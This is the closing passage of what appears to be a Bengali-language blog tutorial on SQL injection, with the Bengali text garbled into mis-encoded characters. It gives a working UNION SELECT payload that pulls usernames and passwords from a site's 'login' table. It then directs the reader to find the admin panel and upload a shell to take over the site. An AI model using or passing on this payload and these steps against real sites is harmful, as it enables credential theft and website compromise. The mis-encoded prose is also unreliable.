āĻāĻāύ āĻāϏāϞ āĻাāĻ āĻļুāϰু ।
āĻāĻāύ āĻāĻŽāϰা āĻāϞাāĻŽ āĻĨেāĻে id āĻāĻŦং password āĻš্āϝাāĻ āĻāϰāĻŦো ।
āĻāĻāύ āĻāĻŽāϰা (username,0x3a,password) āĻāĻ āĻāĻŽাāύ্āĻĄāĻি āĻŦ্āϝাāĻŦāĻšাāϰ āĻāϰāĻŦো
āĻāĻŦং login āĻেāĻŦিāϞ āĻĨেāĻে āĻāĻ āĻĻুāĻāĻি āĻāϞাāĻŽেāϰ āĻĄাāĻা āĻŦেāϰ āĻāϰāĻŦো ।
āϝাāϰ āĻāύ্āϝে āĻāĻŽাāύ্āĻĄ āĻšāĻŦে।
āĻāĻĻাāĻšাāϰāĻŖঃ
http://www.exaplme.sqlsite.com/page.php
?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
āĻāĻāύ āĻāĻĒāύি username āĻāĻŦং password āĻĻেāĻāϤে āĻĒাāĻŦেāύ।
āĻāĻāύ āĻāĻĒāύাāϰ āĻাāĻ āĻšāĻŦে āĻāĻĄāĻŽিāύ āĻĒ্āϝাāύেāϞ āĻŦেāϰ āĻāϰে āϏাāĻāĻāĻা āϤে āĻļেāϞ āĻāĻĒāϞোāĻĄ āĻāϰে āĻš্āϝাāĻ āĻāϰে āĻĢেāϞা
āĻāĻŽি āĻāĻি āĻĢেāĻāϏāĻŦুāĻেঃ http://facebook.com/zayyan.ahmed.71
āϝāĻĻি āĻেāĻ āϰিāĻুāĻāϏ্āĻ āĻĒাāĻ াāύ āĻĻā§া āĻāϰে āĻāĻāĻা āĻŽেāϏেāĻ āĻĻিā§ে āĻĻিāĻŦেāύ āϏাāĻĨে।
āϝাāϤে āĻŦুāĻāϤে āϏুāĻŦিāϧা āĻšā§।
āĻĒ্āϰাā§ āĻĒাঁāĻ āĻāύ্āĻা āĻāώ্āĻ āĻāϰে āϏāĻŽ্āĻĒূāϰ্āĻŖ āĻিāĻāύāĻা āϞেāĻāϞাāĻŽ, āĻāĻļা āĻāϰি āĻāĻĒāύাāĻĻেāϰ āĻ
āύেāĻ āĻাāϞো āϞেāĻেāĻে।
āĻāĻাāĻŽি āĻিāĻāĻোāϰিā§াāϞে String Based Sql Injection āύিā§ে āϞেāĻাāϰ āĻেāώ্āĻা āĻāϰāĻŦো।
āĻĒোāϏ্āĻ āϏāĻŽ্āĻĒāϰ্āĻিāϤ āϏāĻŽāϏ্āϝাāϰ āĻāύ্āϝ āĻŽāύ্āϤāĻŦ্āϝ āĻĻিāύ।āĻĄাāĻāύāϞোāĻĄ āϞিāĻ্āĻ āĻ āϏāĻŽāϏ্āϝা āĻāύ্āϝ āĻāύāĻŦāĻ্āϏ āĻāϰুāύ Aimzworld007
ConversionConversion EmoticonEmoticon